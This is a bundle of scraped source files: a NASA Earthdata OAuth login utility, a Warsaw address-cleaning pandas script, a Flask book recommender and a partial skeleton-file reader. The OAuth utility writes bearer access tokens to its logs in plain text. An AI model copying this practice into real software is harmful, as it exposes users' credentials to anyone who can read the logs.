{}.execute-api.{}.amazonaws.com/{}'.format(ctxt['apiId'], os.getenv('AWS_DEFAULT_REGION', ''), ctxt['stage']))\n\n urs_url = '{0}?client_id={1}&response_type=code&redirect_uri={2}'.format(base_url, client_id, get_redirect_url(ctxt))\n if to:\n urs_url += \"&state={0}\".format(to)\n\n # Try to handle scripts\n agent_pattern = re.compile('^(curl|wget|aria2|python)', re.IGNORECASE)\n\n try:\n download_agent = ctxt['identity']['userAgent']\n except IndexError:\n log.debug(\"No User Agent!\")\n return urs_url\n\n if agent_pattern.match(download_agent):\n urs_url += \"&app_type=401\"\n\n return urs_url\n\n\ndef get_profile(user_id, token, temptoken=False):\n if not user_id or not token:\n return {}\n\n # get_new_token_and_profile() will pass this function a temporary token with which to fetch the profile info. 
We\n # don't want to keep it around, just use it here, once:\n if temptoken:\n headertoken = temptoken\n else:\n headertoken = token\n\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/api/users/{0}\".format(user_id)\n headers = {\"Authorization\": \"Bearer \" + headertoken}\n req = urllib.request.Request(url, None, headers)\n\n try:\n\n response = urllib.request.urlopen(req) # nosec URL is *always* URS.\n packet = response.read()\n\n user_profile = loads(packet)\n\n return user_profile\n\n except urllib.error.URLError as e:\n log.warning(\"Error fetching profile: {0}\".format(e))\n if not temptoken: # This keeps get_new_token_and_profile() from calling this over and over\n log.debug('because error above, going to get_new_token_and_profile()')\n return get_new_token_and_profile(user_id, token)\n else:\n log.debug('We got that 401 above and we\\'re using a temptoken ({}), so giving up and not getting a profile.'.format(temptoken))\n return {}\n\n\ndef get_new_token_and_profile(user_id, cookietoken):\n\n # get a new token\n url = os.getenv('AUTH_BASE_URL', 'https://urs.earthdata.nasa.gov') + \"/oauth/token\"\n\n # App U:P from URS Application\n auth = get_urs_creds()['UrsAuth']\n post_data = {\"grant_type\": \"client_credentials\" }\n headers = {\"Authorization\": \"BASIC \" + auth}\n\n # Download token\n post_data_encoded = urllib.parse.urlencode(post_data).encode(\"utf-8\")\n post_request = urllib.request.Request(url, post_data_encoded, headers)\n\n t0 = time()\n try:\n log.info(\"Attempting to get new Token\")\n\n response = urllib.request.urlopen(post_request) #nosec URL is *always* URS.\n t1 = time()\n packet = response.read()\n new_token = loads(packet)['access_token']\n t2 = time()\n log.info(\"Retrieved new token: {0}\".format(new_token))\n log.debug('ET for get_new_token_and_profile() urlopen() {} sec'.format(t1 - t0))\n log.debug('ET for get_new_token_and_profile() response.read() and loads() {} sec'.format(t2- t1))\n # Get user profile with new token\n return get_profile(user_id, cookietoken, new_token)\n\n except urllib.error.URLError as e:\n log.error(\"Error fetching auth: {0}\".format(e))\n log.debug('ET for the attempt: {}'.format(format(round(time() - t0, 4))))\n return False\n\n\ndef user_in_group_list(private_groups, user_groups):\n client_id = get_urs_creds()['UrsId']\n log.info(\"Searching for private groups {0} in {1}\".format(private_groups, user_groups))\n for u_g in user_groups:\n if u_g['client_id'] == client_id:\n for p_g in private_groups:\n if p_g == u_g['name']:\n # Found the matching group!\n log.info(\"User belongs to private group {}\".format(p_g))\n return True\n\n\ndef user_in_group_urs(private_groups, user_id, token, user_profile=None, refresh_first=False):\n\n new_profile = {}\n\n if refresh_first or not user_profile:\n user_profile = get_profile(user_id, token)\n new_profile = user_profile\n\n if isinstance(user_profile, dict) and 'user_groups' in user_profile and user_in_group_list(private_groups, user_profile['user_groups']):\n log.info(\"User {0} belongs to private group\".format(user_id))\n return True, new_profile\n\n else:\n # Couldn't find user in provided groups, but we may as well look at a fresh group list:\n if not refresh_first:\n # we have a maybe not so fresh user_profile and we could try again to see if someone added a group to this user:\n log.debug(\"Could not validate user {0} belonging to groups {1}, attempting profile refresh\".format(user_id, private_groups))\n\n return user_in_group_urs(private_groups, 
user_id, {}, refresh_first=True)\n log.debug(\"Even after profile refresh, user {0} does not belong to groups {1}\".format(user_id, private_groups))\n\n return False, new_profile\n\n\ndef user_in_group(private_groups, cookievars, user_profile=None, refresh_first=False):\n\n # If a new profile is fetched, it is assigned to this var, and returned so that a fresh jwt cookie can be set.\n new_profile = {}\n\n if not private_groups:\n return False, new_profile\n\n try:\n jwt_payload = cookievars[JWT_COOKIE_NAME]\n\n except (KeyError, IndexError) as e:\n log.error('JWT cookie not present. ')\n\n return False\n\n else:\n if refresh_first:\n new_profile = get_profile(jwt_payload['urs-user-id'], jwt_payload['urs-access-token'])\n jwt_payload['user_groups'] = new_profile['user_groups']\n # TODO: reset fresh group-membership JWT cookie now? Somehow?\n\n in_group = user_in_group_list(private_groups, jwt_payload['urs-groups'])\n if in_group:\n return True, new_profile\n elif not in_group and not refresh_first:\n # TODO: look at ['iat'] and if cookie is recent enough (how recent?), don't bother doing this.\n # one last ditch effort to see if they were so very recently added to group:\n jwt_payload['user_groups'] = get_profile(jwt_payload['urs-user-id'], jwt_payload['urs-access-token'])['user_groups']\n return user_in_group(private_groups, cookievars, {}, refresh_first=True)\n else:\n return False, new_profile\n\n\ndef get_urs_creds():\n \"\"\"\n Fetches URS creds from secrets manager.\n :return: looks like:\n {\n \"UrsId\": \"stringofseeminglyrandomcharacters\",\n \"UrsAuth\": \"verymuchlongerstringofseeminglyrandomcharacters\"\n }\n :type: dict\n \"\"\"\n secret_name = os.getenv('URS_CREDS_SECRET_NAME', None)\n\n if not secret_name:\n log.error('URS_CREDS_SECRET_NAME not set')\n return {}\n secret = retrieve_secret(secret_name)\n if not ('UrsId' in secret and 'UrsAuth' in secret):\n log.error('AWS secret {} does not contain required keys \"UrsId\" and \"UrsAuth\"'.format(secret_name))\n\n return secret\n\n\ndef user_profile_2_jwt_payload(user_id, access_token, user_profile):\n return {\n # Do we want more items in here?\n 'first_name': user_profile['first_name'],\n 'last_name': user_profile['last_name'],\n 'urs-user-id': user_id,\n 'urs-access-token': access_token,\n 'urs-groups': user_profile['user_groups'],\n 'iat': int(time()),\n 'exp': get_exp_time(),\n }\n\n\n# This do_login() is mainly for chalice clients.\ndef do_login(args, context, cookie_domain=''):\n\n log.debug('the query_params: {}'.format(args))\n\n if not args:\n template_vars = {'contentstring': 'No params', 'title': 'Could Not Login'}\n headers = {}\n return 400, template_vars, headers\n\n if args.get('error', False):\n contentstring = 'An error occurred while trying to log into URS. URS says: \"{}\". '.format(args.get('error', ''))\n if args.get('error') == 'access_denied':\n # This happens when user doesn't agree to EULA. 
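user_profile_2_jwt_payload() above assembles the claims dict (iat, exp, URS ids and groups) that make_set_cookie_headers_jwt() later signs into a cookie; the signing code itself is not in this record, so the PyJWT calls and the HS256 key below are assumptions, used purely to show how such a payload round-trips.

# Signing/verifying a payload shaped like user_profile_2_jwt_payload()'s
# output. PyJWT and the HS256 secret are assumptions; the real signing
# happens inside make_set_cookie_headers_jwt(), which is not shown here.
import time
import jwt  # PyJWT

SECRET = 'not-a-real-key'  # placeholder
payload = {
    'urs-user-id': 'someuser',
    'urs-groups': [],
    'iat': int(time.time()),
    'exp': int(time.time()) + 3600,
}
token = jwt.encode(payload, SECRET, algorithm='HS256')
decoded = jwt.decode(token, SECRET, algorithms=['HS256'])
assert decoded['urs-user-id'] == 'someuser'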
Maybe other times too.\n return_status = 401\n contentstring += 'Be sure to agree to the EULA.'\n else:\n return_status = 400\n\n template_vars = {'contentstring': contentstring, 'title': 'Could Not Login'}\n\n return return_status, template_vars, {}\n\n if 'code' not in args:\n contentstring = 'Did not get the required CODE from URS'\n\n template_vars = {'contentstring': contentstring, 'title': 'Could not login.'}\n headers = {}\n return 400, template_vars, headers\n\n log.debug('pre-do_auth() query params: {}'.format(args))\n redir_url = get_redirect_url(context)\n auth = do_auth(args.get('code', ''), redir_url)\n log.debug('auth: {}'.format(auth))\n if not auth:\n log.debug('no auth returned from do_auth()')\n\n template_vars = {'contentstring': 'There was a problem talking to URS Login', 'title': 'Could Not Login'}\n\n return 400, template_vars, {}\n\n user_id = auth['endpoint'].split('/')[-1]\n\n user_profile = get_profile(user_id, auth['access_token'])\n log.debug('Got the user profile: {}'.format(user_profile))\n if user_profile:\n log.debug('urs-access-token: {}'.format(auth['access_token']))\n if 'state' in args:\n redirect_to = args[\"state\"]\n else:\n redirect_to = get_base_url(context)\n\n if 'user_groups' not in user_profile or not user_profile['user_groups']:\n user_profile['user_groups'] = []\n\n jwt_cookie_payload = user_profile_2_jwt_payload(user_id, auth['access_token'], user_profile)\n\n headers = {'Location': redirect_to}\n headers.update(make_set_cookie_headers_jwt(jwt_cookie_payload, '', cookie_domain))\n return 301, {}, headers\n\n template_vars = {'contentstring': 'Could not get user profile from URS', 'title': 'Could Not Login'}\n return 400, template_vars, {}\n","sub_path":"rain_api_core/urs_util.py","file_name":"urs_util.py","file_ext":"py","file_size_in_byte":12237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64083845","text":"import csv\r\nimport sys, os\r\nimport pandas as pd\r\n\r\nsys.path.append('C:/Users/OEM/data_mining/oto_dom/')\r\nimport tools.addressMatching as am\r\n\r\ndef loadRawFile(file):\r\n with open( file + \".csv\") as f:\r\n spamreader = csv.reader(f, delimiter=';', quotechar='|')\r\n lst = []\r\n col_names = []\r\n for i,row in enumerate(spamreader):\r\n if i == 0:\r\n col_names = row\r\n continue\r\n lst.append(dict(zip(col_names,row)))\r\n \r\n df = pd.DataFrame(lst)\r\n return df.set_index('id')\r\n\r\ncity = 'warszawa'\r\n\r\nmatched = loadRawFile('C:/Users/OEM/data_mining/oto_dom/utils/matched')\r\n\r\nsample = loadRawFile('C:/Users/OEM/data_mining/oto_dom/data/' + city+'_raw')\r\n\r\n#\r\nadr_match = am.AddressMatching(city)\r\nad = adr_match.loadAddresses('C:/Users/OEM/data_mining/oto_dom/utils/warszawa_addresses.csv')\r\nsample = adr_match.stripAddress(sample)\r\n\r\nam.addressStats(sample,'raw sample') \r\n\r\nsample['orig_street'] = [False if s == '.' 
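loadRawFile() above assembles the DataFrame row by row through csv.reader; pandas can produce the same frame in one call when given the same delimiter and quote character. A sketch of the equivalent, assuming the same ';'-separated, '|'-quoted layout with an 'id' column:

# One-call equivalent of loadRawFile(), same ';' delimiter and '|' quoting.
import pandas as pd

def load_raw_file(file):
    df = pd.read_csv(file + '.csv', sep=';', quotechar='|', dtype=str)
    return df.set_index('id')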
else True for s in sample['Street']]\r\n#\r\n# Removing rows that do not have any address items\r\n#\r\nsample = sample[(sample['Borough'] != '.') | (sample['Neighbourhood'] != '.') | (sample['Street'] != '.') \\\r\n | (sample['district'] != '.') | (sample['Unknown'] != '.')]\r\n#\r\n# correcting name of boroughs/neighbourhoods/streets/\r\n#\r\nmapping = {'praga-północ':'praga północ','praga-południe':'praga południe','centrum':'śródmieście','dolny mokotów':'mokotów','górny mokotów':'mokotów'}\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Borough', mapping)\r\n\r\nmapping = {'starówka':'stare miasto','imielin':'stary imielin','stary wilanów':'wilanów wysoki','kawęczyn':'kawęczyn-wygoda' \\\r\n ,'miasteczko wilanów': 'błonia wilanowskie', }\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\nmapping = {'ken':'Komisji Edukacji Narodowej, al.'}\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'street', mapping)\r\n\r\n#\r\n# words removed from unknown\r\n#\r\nto_delete_from_address_item = ['ul.', 'al.', 'pokoje','winda kuchnia','windą kuchnią','balkon', 'mieszkanie', 'mieszkania', 'nowoczesnej', \\\r\n 'centrum','kuchnia','kuchnią','górny mokotów','dolny mokotów', 'warszawa', 'metro', 'metra', 'ulica','prowizji']\r\nfor item in to_delete_from_address_item:\r\n sample['Unknown'] = [i.replace(item,'') for i in sample['Unknown']]\r\n\r\n# \r\n# removing rows when unknown address item contains one of the phrase given\r\n#\r\n\r\nto_erase = ['mdm', 'nowa inwestycja', 'promocja', 'niska cena']\r\nfor item in to_erase:\r\n sample['Unknown'] = ['to_delete' if item in i else i for i in sample['Unknown']]\r\ntemp = sample[sample['Unknown'] == 'to_delete']\r\ndel temp\r\nsample['Unknown'] = ['.' if i == 'to_delete' else i for i in sample['Unknown']]\r\n\r\n# \r\n# removing white signs and correcting the inputs\r\n#\r\nsample['Unknown'] = [i.lstrip() for i in sample['Unknown']]\r\nsample['Unknown'] = [i.replace(' ',' ') for i in sample['Unknown']]\r\nsample['Unknown'] = ['.' 
if i == '' or i == ' ' else i for i in sample['Unknown'] ]\r\n\r\nam.addressStats(sample,'cleaned sample') \r\n\r\n#\r\n# filling boroughs and neighbourhoods names basing on the column district\r\n#\r\n\r\nsample['district'] = sample['district'].apply(lambda x: x.lower()) \r\n#sample = adr_match.fillBasingOnDistrict(sample, 'Neighbourhood') \r\n#sample = adr_match.fillBasingOnDistrict(sample, 'Borough')\r\n\r\n\r\ndistrict_borough_mapping = dict()\r\nfor borough in ad['Borough'].unique():\r\n district_borough_mapping[borough.lower()] = borough.lower()\r\nfor borough, neighbourhood in zip(ad['Borough'],ad['Neighbourhood']):\r\n district_borough_mapping[neighbourhood.lower()] = borough.lower() \r\n\r\ndistrict_borough_mapping['.'] = '.'\r\ndistrict_borough_mapping['annopol'] = 'białołęka'\r\ndistrict_borough_mapping['augustów'] = 'białołęka'\r\ndistrict_borough_mapping['białołęka dworska'] = 'białołęka'\r\ndistrict_borough_mapping['buraków'] = 'bielany'\r\ndistrict_borough_mapping['centrum'] ='śródmieście'\r\ndistrict_borough_mapping['dolny mokotów'] = 'mokotów'\r\ndistrict_borough_mapping['górny mokotów'] ='mokotów'\r\ndistrict_borough_mapping['imielin'] = 'ursynów'\r\ndistrict_borough_mapping['jelonki'] = 'bemowo'\r\ndistrict_borough_mapping['kawęczyn'] = 'rembertów'\r\ndistrict_borough_mapping['kąty grodziskie'] = 'białołęka'\r\ndistrict_borough_mapping['kępa gocławska'] = 'praga południe'\r\ndistrict_borough_mapping['kępa tarchomińska'] = 'białołęka'\r\ndistrict_borough_mapping['królikarnia'] = 'mokotów'\r\ndistrict_borough_mapping['latawiec'] = 'śródmieście'\r\ndistrict_borough_mapping['lewandów'] = 'białołęka'\r\ndistrict_borough_mapping['mariensztat'] = 'śródmieście'\r\ndistrict_borough_mapping['marymont'] = 'bielany'\r\ndistrict_borough_mapping['metro wilanowska'] = 'mokotów'\r\ndistrict_borough_mapping['moczydło'] = 'wola'\r\ndistrict_borough_mapping['nadwilanówka'] = 'wilanów'\r\ndistrict_borough_mapping['nowe bródno'] = 'targówek'\r\ndistrict_borough_mapping['nowe górce'] = 'bemowo'\r\ndistrict_borough_mapping['nowy służewiec'] = 'ursynów'\r\ndistrict_borough_mapping['pola mokotowskie'] = 'mokotów'\r\ndistrict_borough_mapping['praga-południe'] = 'praga południe'\r\ndistrict_borough_mapping['praga-północ'] = 'praga północ'\r\ndistrict_borough_mapping['praga'] = 'praga południe'\r\ndistrict_borough_mapping['przyczółek grochowski'] = 'praga południe'\r\ndistrict_borough_mapping['stokłosy'] = 'ursynów'\r\ndistrict_borough_mapping['witolin'] = 'praga południe'\r\ndistrict_borough_mapping['zielona'] = 'wesoła'\r\n\r\nsample = adr_match.applyMapping(sample, 'district', 'Borough', district_borough_mapping,False)\r\n\r\n#for item in sample['district'].unique():\r\n# if not item in district_borough_mapping.keys():\r\n# print(item)\r\n\r\ndistrict_neighbourhood_mapping = dict()\r\nfor borough, neighbourhood in zip(ad['Borough'],ad['Neighbourhood']):\r\n district_neighbourhood_mapping[neighbourhood.lower()] = borough.lower() \r\nfor borough in ad['Borough'].unique():\r\n district_neighbourhood_mapping[borough.lower()] ='.'\r\n\r\ndistrict_neighbourhood_mapping['dolny mokotów'] = '.'\r\ndistrict_neighbourhood_mapping['górny mokotów'] = '.'\r\ndistrict_neighbourhood_mapping['praga'] = '.'\r\ndistrict_neighbourhood_mapping['praga-południe'] = '.'\r\ndistrict_neighbourhood_mapping['praga-północ'] = '.'\r\n\r\ndistrict_neighbourhood_mapping['.'] = '.'\r\ndistrict_neighbourhood_mapping['annopol'] = 'żerań' \r\ndistrict_neighbourhood_mapping['augustów'] = 
'grodzisk'\r\ndistrict_neighbourhood_mapping['białołęka dworska'] = 'dworska'\r\ndistrict_neighbourhood_mapping['buraków'] = 'młociny' \r\ndistrict_neighbourhood_mapping['centrum'] = 'śródmieście północne'\r\ndistrict_neighbourhood_mapping['imielin'] = 'stary imielin'\r\ndistrict_neighbourhood_mapping['jelonki'] = 'jelonki północne'\r\ndistrict_neighbourhood_mapping['kawęczyn'] = 'kawęczyn-wygoda'\r\ndistrict_neighbourhood_mapping['kąty grodziskie'] = 'grodzisk'\r\ndistrict_neighbourhood_mapping['kępa gocławska'] = 'gocław' \r\ndistrict_neighbourhood_mapping['kępa tarchomińska'] = 'nowodwory'\r\ndistrict_neighbourhood_mapping['królikarnia'] = 'ksawerów'\r\ndistrict_neighbourhood_mapping['latawiec'] = 'śródmieście południowe'\r\ndistrict_neighbourhood_mapping['lewandów'] = 'grodzisk'\r\ndistrict_neighbourhood_mapping['mariensztat'] = 'powiśle'\r\ndistrict_neighbourhood_mapping['marymont'] = 'marymont-kaskada'\r\ndistrict_neighbourhood_mapping['metro wilanowska'] = 'ksawerów'\r\ndistrict_neighbourhood_mapping['moczydło'] = 'koło' \r\ndistrict_neighbourhood_mapping['nadwilanówka'] = 'powsin'\r\ndistrict_neighbourhood_mapping['nowe bródno'] = 'bródno'\r\ndistrict_neighbourhood_mapping['nowe górce'] = 'górce' \r\ndistrict_neighbourhood_mapping['nowy służewiec'] = 'wyczółki'\r\ndistrict_neighbourhood_mapping['pola mokotowskie'] = 'stary mokotów'\r\ndistrict_neighbourhood_mapping['przyczółek grochowski'] = 'grochów'\r\ndistrict_neighbourhood_mapping['stokłosy'] = 'ursynów północny'\r\ndistrict_neighbourhood_mapping['witolin'] = 'gocławek'\r\ndistrict_neighbourhood_mapping['zielona'] = 'zielona-grzybowa'\r\n\r\n\r\n#for item in sample['district'].unique():\r\n# if not item in district_neighbourhood_mapping.keys():\r\n# print(item)\r\n\r\nsample = adr_match.applyMapping(sample, 'district', 'Neighbourhood', district_neighbourhood_mapping,False)\r\n\r\n\r\nam.addressStats(sample,'after filling based on district') \r\n\r\n#\r\n# Sometimes the name of borough or neighbourhood was not matched \r\n# because apart from borough/neighoourhood name there were other words, like \"Wola new apartment\"\r\n# Here we check if in uknown address item there is a name of borough/neighbourhood\r\n#\r\nsample = adr_match.findInUnkowns('Borough',sample)\r\nsample = adr_match.findInUnkowns('Neighbourhood',sample)\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nsample = adr_match.internalFilling(sample,'Neighbourhood','Borough')\r\nsample = adr_match.internalFilling(sample,'Street','Neighbourhood')\r\nsample = adr_match.internalFilling(sample,'Street','Borough')\r\n\r\nam.addressStats(sample,'filling based on other address items') \r\n\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nmapping = matched[matched['Item']=='street'].set_index('Key')['Match'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmapping = matched[matched['Item']=='neighbourhood'].set_index('Key')['Match'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n\r\nam.addressStats(sample,'after using matched') \r\n#\r\n# Matching strings. 
Sometimes the address of the flat couldn't have been recognized because of typo \r\n# or incomplete name like Mickiewicza instead of Adama Mickiewicza\r\n# Using a sequence matcher we can try to match addresses\r\n\r\n#\r\n# Here we try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the neighbourhood\r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'full', 20) \r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'sort', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'partial', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Neighbourhood', 'Street', 'set', 20)\r\n#mapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough, \r\n# we compare do not compare strings per se, but sorted tokens\r\n# We select only items with matching score higher than 72%. We manually delete some erroneously assigned streets\r\n# Then we select those with score higher than 61 and when the difference between best match and second best match is larger than 10% \r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'sort', 50)\r\nmapping = matching[(matching['Score1']>=65)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n\r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough\r\n# We select only items with matching score higher than 79%. \r\n#\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'partial', 50)\r\nmapping = matching[matching['Score1']>=90].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'set', 50)\r\nmapping = matching[(matching['Score1']>=73) & (matching['Diff_Score1_Score2']>=10)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n# \r\n#\r\n# We try to match the streets names \r\n# To make algorithm works faster and be less error prone, we try to match street names within the borough\r\n# We select only items with matching score higher than 90%. 
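matchAddresses() lives in tools.addressMatching and is not shown in this record; the scorer names it takes ('full', 'sort', 'partial', 'set') and the 0-100 scores filtered on below suggest fuzzywuzzy-style string scorers. For orientation, the four flavours behave like this (fuzzywuzzy assumed):

# The four scorer flavours the matching passes appear to use; fuzzywuzzy
# is an assumption, since matchAddresses() itself is defined elsewhere.
from fuzzywuzzy import fuzz

a, b = 'mickiewicza', 'adama mickiewicza'
print(fuzz.ratio(a, b))             # 'full'    - plain edit-distance ratio
print(fuzz.token_sort_ratio(a, b))  # 'sort'    - tokens sorted, then compared
print(fuzz.partial_ratio(a, b))     # 'partial' - best-matching substring
print(fuzz.token_set_ratio(a, b))   # 'set'     - scores common tokens first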
\r\n#\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'partial', 50)\r\n#mapping = matching[(matching['Score1']>63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'set', 50)\r\n#mapping = matching[(matching['Score1']>63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'full', 50)\r\nmapping = matching[(matching['Score1']>=63)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Street', 'sort', 50)\r\n#mapping = matching[(matching['Score1']>=63)].set_index('Item')['Match1'].to_dict()\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n#\r\n# We try to match the neighbourhoods names \r\n# To make algorithm works faster and be less error prone, we try to match neigbourhood names within the borough\r\n# We select only items with matching score higher than 90%. \r\n#\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Neighbourhood', 'full', 50)\r\nmapping = matching[(matching['Score1']>=60) ].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n\r\nmatching = adr_match.matchAddresses(sample, 'Borough', 'Neighbourhood', 'partial', 50)\r\nmapping = matching[(matching['Score1']>76)].set_index('Item')['Match1'].to_dict()\r\nsample = adr_match.applyMapping(sample, 'Unknown', 'Neighbourhood', mapping)\r\n\r\n#\r\n# We try to match addresses using not truncated sample as before, but whole list of street/neighbourhood/borough names\r\n#\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'sort', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'full', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'partial', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Street', 'set', 40)\r\n#\r\n#matching = adr_match.matchAddresses(sample, None, 'Neighbourhood', 'full', 40)\r\n#matching = adr_match.matchAddresses(sample, None, 'Neighbourhood', 'sort', 40)\r\n\r\n\r\nam.addressStats(sample,'after sequence matching')\r\n\r\n#\r\n# Examining the unrecognized address items\r\n#\r\n\r\nunknown = sample.groupby(['Unknown']).count()['Street']\r\n\r\n\r\n#sample = adr_match.applyMapping(sample, 'Unknown', 'Street', mapping)\r\n\r\n\r\n#for item in mapping.keys():\r\n# temp = {\"Item\":\"street\"}\r\n# temp['Key'] = item\r\n# temp['Match'] = mapping[item]\r\n# matched = matched.append(temp,ignore_index=True)\r\n\r\n#\r\n# Filling the name of boroughs based on the name of neighbourhood etc.\r\n#\r\nsample = adr_match.internalFilling(sample,'Neighbourhood','Borough')\r\nsample = adr_match.internalFilling(sample,'Street','Neighbourhood')\r\nsample = adr_match.internalFilling(sample,'Street','Borough')\r\n\r\nsample = sample[(sample['Borough'] != '.') | (sample['Neighbourhood'] != '.')]\r\n\r\nam.addressStats(sample,'final')\r\nsample = sample.drop(['Unknown'],axis=1)\r\n\r\n#\r\n# Correcting addreses\r\n# \r\n\r\nmapping = ad.set_index('Neighbourhood')['Borough'].to_dict()\r\nsample['check'] = sample['Neighbourhood'].map(mapping).fillna(\".\").astype(str)\r\nsample['Borough'] = [c if (b != c) and (c!='.') else b for b,c in 
zip(sample['Borough'],sample['check'])]\r\nsample = sample.drop('check',axis=1)\r\n#\r\n#matched['id'] = matched.index\r\n#with open('C:/Users/OEM/data_mining/oto_dom/utils/matched.csv', 'w') as f:\r\n# matched.to_csv(f, header=True, na_rep='.', sep=';',encoding='utf-8',index=False)\r\n\r\nsample['Id'] = sample.index\r\nwith open('C:/Users/OEM/data_mining/oto_dom/data/warszawa_addresses.csv', 'w') as f:\r\n sample.to_csv(f, header=True, na_rep='.', sep=';',encoding='utf-8',index=False)\r\n","sub_path":"addresses_warsaw.py","file_name":"addresses_warsaw.py","file_ext":"py","file_size_in_byte":16871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"258597445","text":"from util import preprocessor\nfrom util import predictions\nfrom flask import Flask, jsonify, request, render_template\nimport json \n\ndef create_app():\n app = Flask(__name__)\n\n @app.route(\"/\")\n def home():\n return \"Welcome!\"\n\n @app.route('/recommend', methods=['GET', 'POST'])\n def get_recommendation():\n if request.method == 'POST':\n data = request.form['description']\n preds = predictions(data)\n authors = [i.split(\"|\") for i in preds['book_authors']]\n titles = preds['book_title'].to_list()\n result = {}\n for i in range(5):\n result[i]={'title':titles[i], 'author':authors[i]}\n res = result\n return render_template('result.html', res=res)\n return render_template(\"form.html\")\n\n @app.route('/api', methods=['POST'])\n def make_predict():\n #get data\n data = request.get_json(force=True)\n #parse\n predict_request = data['book_desc']\n #preds\n preds = predictions(predict_request)\n #send back to browser\n authors = [i.split(\"|\") for i in preds['book_authors']]\n titles = preds['book_title'].to_list()\n result = {}\n for i in range(5):\n result[i]={'title':titles[i], 'author':authors[i]}\n return json.dumps(result)\n\n return app\n\nAPP = create_app()\n\nif __name__ == \"__main__\":\n APP.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637694752","text":"import numpy as np\r\nimport cv2\r\n\r\ndef readSkeleton(filename):\r\n\tske = []\r\n\tf = open(filename, 'r')\r\n\tlines = f.readlines() \r\n\tf.close()\r\n\tif len(lines) < 1:\r\n\t\treturn ske\r\n\tone_ske = []\r\n\tfor line in lines:\r\n\t\tone_axis = []\r\n\t\tfor l in line.split(','):\r\n\t\t\tdata = int(l)\r\n\t\t\tone_axis.append(data)\r\n\t\tone_ske.append(one_axis)\r\n\t#print(one_ske)\r\n\tske = np.transpose(one_ske)\r\n\tske[:,[0,1]] = ske[:,[1,0]]\r\n\tske = ske.tolist()\r\n\t#print(ske)\r\n\treturn ske\r\n\r\n#Read lookup table\r\ndef readLookupTable(filename):\r\n\ttable = []\r\n\tf = open(filename, 'r')\r\n\tlines = f.readlines()\r\n\tf.close()\r\n\tfor line in lines:\r\n\t\tx, y = [int(i) for i in line.split(':')]\r\n\t\t#minus one, since python count from one for array index\r\n\t\t# x = x -1\r\n\t\t# y = y -1\r\n\t\ttable.append((x,y))\r\n\tprint(table)\r\n\treturn table\r\n\r\n#Gen 14 different colors for 14 edges\r\ndef 